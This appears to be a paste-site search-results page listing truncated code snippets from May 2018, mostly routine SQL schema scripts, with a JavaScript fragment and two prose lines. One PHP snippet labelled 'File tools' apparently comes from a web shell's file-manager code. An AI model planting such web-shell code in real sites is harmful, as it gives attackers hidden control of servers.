42.7K results in 805 ms
8 years ago · May 17, 2018, 05:30 PM
DROP database if exists hotels; CREATE database hotels; USE hotels; CREATE TABLE rooms( numOfRoom INT PRIMARY
8 years ago · May 17, 2018, 05:28 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · May 17, 2018, 05:22 PM
adress, zipcode, comp; DROP TABLE IF EXISTS tabel_address, tabel_zipcode, tabel_comp, tabel_city; CREATE TABLE tabel_city( city_key int(100)
8 years ago · May 17, 2018, 05:00 PM
structure for table `api` -- CREATE TABLE IF NOT EXISTS `api` ( `id` int(2) NOT
8 years ago · May 17, 2018, 04:46 PM
SET FOREIGN_KEY_CHECKS=0; drop table if exists whmcs__mrr_domains; CREATE TABLE `whmcs__mrr_domains` ( `mrr` decimal(36,6)
8 years ago · May 17, 2018, 04:10 PM
src='https://i.imgur.com/S4WuNVn.png'></td>"; thString += "</tr>"; } } } thString += "</table>"; if (document.getElementById("tradeHistoryModalBody").style.display != "none") { tradeHistoryModalBodyTable.innerHTML = thString;
8 years ago · May 17, 2018, 03:48 PM
the same timeframe, and if the same chart exists on server B, it
8 years ago · May 17, 2018, 03:48 PM
drop database if exists test_poo; create database test_poo; use test_poo; create table queue_table (i int not
8 years ago · May 17, 2018, 03:40 PM
table and all dependent table records by event_id. */ delimiter $$ DROP PROCEDURE IF EXISTS sportsdb_delete_event_data_by_id$$ CREATE PROCEDURE sportsdb_delete_event_data_by_id (IN in_event_id
8 years ago · May 17, 2018, 03:24 PM
DROP DATABASE IF EXISTS KAT; CREATE DATABASE KAT; USE KAT; CREATE TABLE towns( id INT PRIMARY
8 years ago · May 17, 2018, 03:08 PM
DROP TABLE IF EXISTS `buffitems`; CREATE TABLE `buffitems` (`ability` VARCHAR(10) NOT NULL, `name` VARCHAR(150) NOT
8 years ago · May 17, 2018, 02:44 PM
DROP TABLE IF EXISTS tmp_hm_account_org_person; CREATE TEMPORARY TABLE tmp_hm_account_org_person AS
8 years ago · May 17, 2018, 02:34 PM
DROP TABLE IF EXISTS `buffitems`; CREATE TABLE `buffitems` (`ability` VARCHAR(10) NOT NULL, `name` VARCHAR(150) NOT
8 years ago · May 17, 2018, 02:28 PM
There are some curious, if not conscious, falsifications of fact,
8 years ago · May 17, 2018, 01:38 PM
exists Transakcje."._FK"; drop table if exists Transakcje; /*==============================================================*/ /* Table: Transakcje */ /*==============================================================*/ create table Transakcje ( IdTranskacji numeric(10) not null, IdPojazdu numeric(10) null,
8 years ago · May 17, 2018, 01:38 PM
exists Transakcje."._FK"; drop table if exists Transakcje; /*==============================================================*/ /* Table: Transakcje */ /*==============================================================*/ create table Transakcje ( IdTranskacji numeric(10) not null, IdPojazdu numeric(10) null,
8 years ago · May 17, 2018, 01:00 PM
DROP TABLE IF EXISTS `customer1`; CREATE TABLE `customer1` ( `pk` BIGINT NOT NULL AUTO_INCREMENT, `id` BIGINT
8 years ago · May 17, 2018, 12:50 PM
return true if param exists, otherwise false end if not (givenValue or toRet) or
8 years ago · May 17, 2018, 12:44 PM
EXISTS Naslov; DROP TABLE IF EXISTS Kraj; /* Ustvarjanje tabel */ CREATE TABLE Uporabnik( Id_uporabnik INTEGER NOT NULL, Uporabnisko_ime VARCHAR(45) NOT
8 years ago · May 17, 2018, 12:16 PM
INFORMATION_SCHEMA.TABLES WHERE table_name='przedmiot2') DROP TABLE przedmiot2; IF EXISTS (SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE
Total pages: 2134